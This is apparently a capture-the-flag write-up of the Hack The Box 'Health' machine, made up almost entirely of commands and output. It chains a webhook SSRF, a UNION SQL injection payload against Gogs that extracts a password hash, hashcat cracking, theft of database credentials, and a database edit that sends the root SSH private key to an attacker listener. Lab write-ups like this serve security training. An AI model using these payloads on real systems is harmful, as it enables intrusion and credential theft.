# SSRF

`http://10.129.56.60/`

```
Payload url : http://10.10.14.19:8081/
Monitored url : http://10.10.14.19/
Interval : * * * * *
Under what circumstances should the webhook be sent?
Always
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# python2 redirect.py --port 80 --ip 10.10.14.19 http://127.0.0.1:3000
serving at port 80
10.129.56.60 - - [23/Aug/2022 16:34:29] "GET / HTTP/1.0" 301 -
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# nc -lvnp 8081
listening on [any] 8081 ...
connect to [10.10.14.19] from (UNKNOWN) [10.129.56.60] 49802
POST / HTTP/1.1
Host: 10.10.14.19:8081
Accept: */*
Content-type: application/json
Content-Length: 7677
Expect: 100-continue

{"webhookUrl":"http:\/\/10.10.14.19:8081\/","monitoredUrl":"http:\/\/10.10.14.19\/","health":"up","body":"<!DOCTYPE html>\n<html>\n\t<head data-suburl=\"\">\n\t\t<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=UTF-8\" \/>\n        <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\"\/>\n        <meta name=\"author\" content=\"Gogs - Go Git Service\"
```

```
GoGits Version: 0.5.5.1010 Beta
```

# SQL Injection

```
python2 redirect.py --port 80 --ip 10.10.14.19 "http://127.0.0.1:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/passwd/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"
```

```
{"data":[{"username":"susanne","avatar":"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce"},{"username":"66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37","avatar":"//1.gravatar.com/avatar/1"}],"ok":true}
```

```
python2 redirect.py --port 80 --ip 10.10.14.19 "http://127.0.0.1:3000/api/v1/users/search?q=e')/**/union/**/all/**/select/**/1,'1',(select/**/salt/**/from/**/user),'1','1','1','1',1,'1',1,1,1,1,1,'1','1','1','1',1,1,'1','1',null,null,'1',1,1--/**/-OR/**/('1'='1"
```

```
{"data":[{"username":"susanne","avatar":"//1.gravatar.com/avatar/c11d48f16f254e918744183ef7b89fce"},{"username":"sO3XIbeW14","avatar":"//1.gravatar.com/avatar/1"}],"ok":true}
```

salt = sO3XIbeW14
password = 66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37

# Crack Hash

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# python3 GogsToHashcat.py 'sO3XIbeW14' '66c074645545781f1064fb7fd1177453db8f0ca2ce58a9d81c04be2e6d3ba2a0d6c032f0fd4ef83f48d74349ec196f4efe37'
sha256:10000:c08zWEliZVcxNA==:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# hashcat -m 10900 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 2904/5872 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

Cracking performance lower than expected?                 

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

sha256:10000:c08zWEliZVcxNA==:ZsB0ZFVFeB8QZPt/0Rd0U9uPDKLOWKnYHAS+Lm07oqDWwDLw/U74P0jXQ0nsGW9O/jc=:february15
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10900 (PBKDF2-HMAC-SHA256)
Hash.Target......: sha256:10000:c08zWEliZVcxNA==:ZsB0ZFVFeB8QZPt/0Rd0U...9O/jc=
Time.Started.....: Tue Aug 23 18:04:38 2022 (40 secs)
Time.Estimated...: Tue Aug 23 18:05:18 2022 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1820 H/s (6.91ms) @ Accel:256 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 71680/14344385 (0.50%)
Rejected.........: 0/71680 (0.00%)
Restore.Point....: 70656/14344385 (0.49%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:9984-9999
Candidate.Engine.: Device Generator
Candidates.#1....: jordan28 -> 280282
Hardware.Mon.#1..: Util: 97%

Started: Tue Aug 23 18:03:40 2022
Stopped: Tue Aug 23 18:05:19 2022
```

# SSH connection

`susanne : february15`

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# ssh susanne@10.129.56.60
susanne@10.129.56.60's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Aug 23 22:07:34 UTC 2022

  System load:  0.0               Processes:           180
  Usage of /:   75.7% of 3.84GB   Users logged in:     0
  Memory usage: 15%               IP address for eth0: 10.129.56.60
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Aug 23 22:07:19 2022 from 10.10.14.19
susanne@health:~$ cat user.txt 
467b4b33ac4f8674a6197e2c425e6848
susanne@health:~$
```

# Crontabs

```
2022/08/23 22:10:22 CMD: UID=0    PID=1      | /sbin/init maybe-ubiquity 
2022/08/23 22:11:01 CMD: UID=0    PID=5567   | /bin/bash -c sleep 5 && /root/meta/clean.sh 
2022/08/23 22:11:01 CMD: UID=0    PID=5566   | 
2022/08/23 22:11:01 CMD: UID=0    PID=5565   | /usr/sbin/CRON -f 
2022/08/23 22:11:01 CMD: UID=0    PID=5564   | /usr/sbin/CRON -f 
2022/08/23 22:11:01 CMD: UID=0    PID=5568   | sleep 5 
2022/08/23 22:11:01 CMD: UID=0    PID=5569   | php artisan schedule:run 
2022/08/23 22:11:02 CMD: UID=0    PID=5572   | grep columns 
2022/08/23 22:11:02 CMD: UID=0    PID=5571   | stty -a 
2022/08/23 22:11:02 CMD: UID=0    PID=5570   | sh -c stty -a | grep columns 
2022/08/23 22:11:02 CMD: UID=0    PID=5575   | grep columns 
2022/08/23 22:11:02 CMD: UID=0    PID=5574   | stty -a 
2022/08/23 22:11:02 CMD: UID=0    PID=5573   | sh -c stty -a | grep columns 
2022/08/23 22:11:06 CMD: UID=0    PID=5576   | mysql laravel --execute TRUNCATE tasks
```

# Enum Files

```
susanne@health:/tmp$ cat /var/www/html/.env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:x12LE6h+TU6x4gNKZIyBOmthalsPLPLv/Bf/MJfGbzY=
APP_DEBUG=true
APP_URL=http://localhost

LOG_CHANNEL=stack
LOG_DEPRECATIONS_CHANNEL=null
LOG_LEVEL=debug

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=laravel
DB_USERNAME=laravel
DB_PASSWORD=MYsql_strongestpass@2014+
```

# Read local files

```
susanne@health:/var/www/html/app/Http/Controllers$ cat HealthChecker.php | grep file -A8 -B4
$json = [];
$json['webhookUrl'] = $webhookUrl;
$json['monitoredUrl'] = $monitoredUrl;

$res = @file_get_contents($monitoredUrl, false);
if ($res) {

    if ($onlyError) {
        return $json;
    }

    $json['health'] = "up";
    $json['body'] = $res;
susanne@health:/var/www/html/app/Http/Controllers$
```

# Access MySQL

```
susanne@health:/tmp$ mysql -u laravel -pMYsql_strongestpass@2014+
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 298
Server version: 5.7.39-0ubuntu0.18.04.2 (Ubuntu)

Copyright (c) 2000, 2022, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>
```

# Priv Esc

Create webhook.

```
Payload url : http://10.10.14.19/
Monitored url : http://10.10.14.19/
Interval : */1 * * * *
Under what circumstances should the webhook be sent?
Always
```

Update registry in mysql.

```
update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
```

```
mysql> select * from tasks;
Empty set (0.00 sec)

mysql> update tasks set monitoredUrl='file:///root/.ssh/id_rsa';
Query OK, 1 row affected (0.00 sec)
Rows matched: 1  Changed: 1  Warnings: 0
```

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# nc -lvnp 80    
listening on [any] 80 ...
connect to [10.10.14.19] from (UNKNOWN) [10.129.56.60] 55330
POST / HTTP/1.1
Host: 10.10.14.19
Accept: */*
Content-type: application/json
Content-Length: 1829
Expect: 100-continue

{"webhookUrl":"http:\/\/10.10.14.19\/","monitoredUrl":"file:\/\/\/root\/.ssh\/id_rsa","health":"up","body":"-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAwddD+eMlmkBmuU77LB0LfuVNJMam9\/jG5NPqc2TfW4Nlj9gE\nKScDJTrF0vXYnIy4yUwM4\/2M31zkuVI007ukvWVRFhRYjwoEPJQUjY2s6B0ykCzq\nIMFxjreovi1DatoMASTI9Dlm85mdL+rBIjJwfp+Via7ZgoxGaFr0pr8xnNePuHH\/\nKuigjMqEn0k6C3EoiBGmEerr1BNKDBHNvdL\/XP1hN4B7egzjcV8Rphj6XRE3bhgH\n7so4Xp3Nbro7H7IwIkTvhgy61bSUIWrTdqKP3KPKxua+TqUqyWGNksmK7bYvzhh8\nW6KAhfnHTO+ppIVqzmam4qbsfisDjJgs6ZwHiQIDAQABAoIBAEQ8IOOwQCZikUae\nNPC8cLWExnkxrMkRvAIFTzy7v5yZToEqS5yo7QSIAedXP58sMkg6Czeeo55lNua9\nt3bpUP6S0c5x7xK7Ne6VOf7yZnF3BbuW8\/v\/3Jeesznu+RJ+G0ezyUGfi0wpQRoD\nC2WcV9lbF+rVsB+yfX5ytjiUiURqR8G8wRYI\/GpGyaCnyHmb6gLQg6Kj+xnxw6Dl\nhnqFXpOWB771WnW9yH7\/IU9Z41t5tMXtYwj0pscZ5+XzzhgXw1y1x\/LUyan++D+8\nefiWCNS3yeM1ehMgGW9SFE+VMVDPM6CIJXNx1YPoQBRYYT0lwqOD1UkiFwDbOVB2\n1bLlZQECgYEA9iT13rdKQ\/zMO6wuqWWB2GiQ47EqpvG8Ejm0qhcJivJbZCxV2kAj\nnVhtw6NRFZ1Gfu21kPTCUTK34iX\/p\/doSsAzWRJFqqwrf36LS56OaSoeYgSFhjn3\nsqW7LTBXGuy0vvyeiKVJsNVNhNOcTKM5LY5NJ2+mOaryB2Y3aUaSKdECgYEAyZou\nfEG0e7rm3z++bZE5YFaaaOdhSNXbwuZkP4DtQzm78Jq5ErBD+a1af2hpuCt7+d1q\n0ipOCXDSsEYL9Q2i1KqPxYopmJNvWxeaHPiuPvJA5Ea5wZV8WWhuspH3657nx8ZQ\nzkbVWX3JRDh4vdFOBGB\/ImdyamXURQ72Xhr7ODkCgYAOYn6T83Y9nup4mkln0OzT\nrti41cO+WeY50nGCdzIxkpRQuF6UEKeELITNqB+2+agDBvVTcVph0Gr6pmnYcRcB\nN1ZI4E59+O3Z15VgZ\/W+o51+8PC0tXKKWDEmJOsSQb8WYkEJj09NLEoJdyxtNiTD\nSsurgFTgjeLzF8ApQNyN4QKBgGBO854QlXP2WYyVGxekpNBNDv7GakctQwrcnU9o\n++99iTbr8zXmVtLT6cOr0bVVsKgxCnLUGuuPplbnX5b1qLAHux8XXb+xzySpJcpp\nUnRnrnBfCSZdj0X3CcrsyI8bHoblSn0AgbN6z8dzYtrrPmYA4ztAR\/xkIP\/Mog1a\nvmChAoGBAKcW+e5kDO1OekLdfvqYM5sHcA2le5KKsDzzsmboGEA4ULKjwnOXqJEU\n6dDHn+VY+LXGCv24IgDN6S78PlcB5acrg6m7OwDyPvXqGrNjvTDEY94BeC\/cQbPm\nQeA60hw935eFZvx1Fn+mTaFvYZFMRMpmERTWOBZ53GTHjSZQoS3G\n-----END RSA PRIVATE KEY-----\n"}
```

# SSH as root

```
┌──(root㉿kali)-[~/htb/Box/Linux/Health]
└─# ssh -i root_rsa root@10.129.56.60
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-191-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Aug 23 22:56:15 UTC 2022

  System load:  0.0               Processes:           181
  Usage of /:   75.8% of 3.84GB   Users logged in:     1
  Memory usage: 19%               IP address for eth0: 10.129.56.60
  Swap usage:   0%


0 updates can be applied immediately.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


root@health:~# cat root.txt 
b8339d5346f0ed9bc149aed214f8dbd5
root@health:~#
```

# References
https://gist.githubusercontent.com/shreddd/b7991ab491384e3c3331/raw/57a633529ce4f495aae25d6270b379f1d3ea6fd5/redirect.py \
https://www.exploit-db.com/exploits/35238 \
https://github.com/gogs/gogs/releases?page=7 \
https://github.com/shinris3n/GogsToHashcat  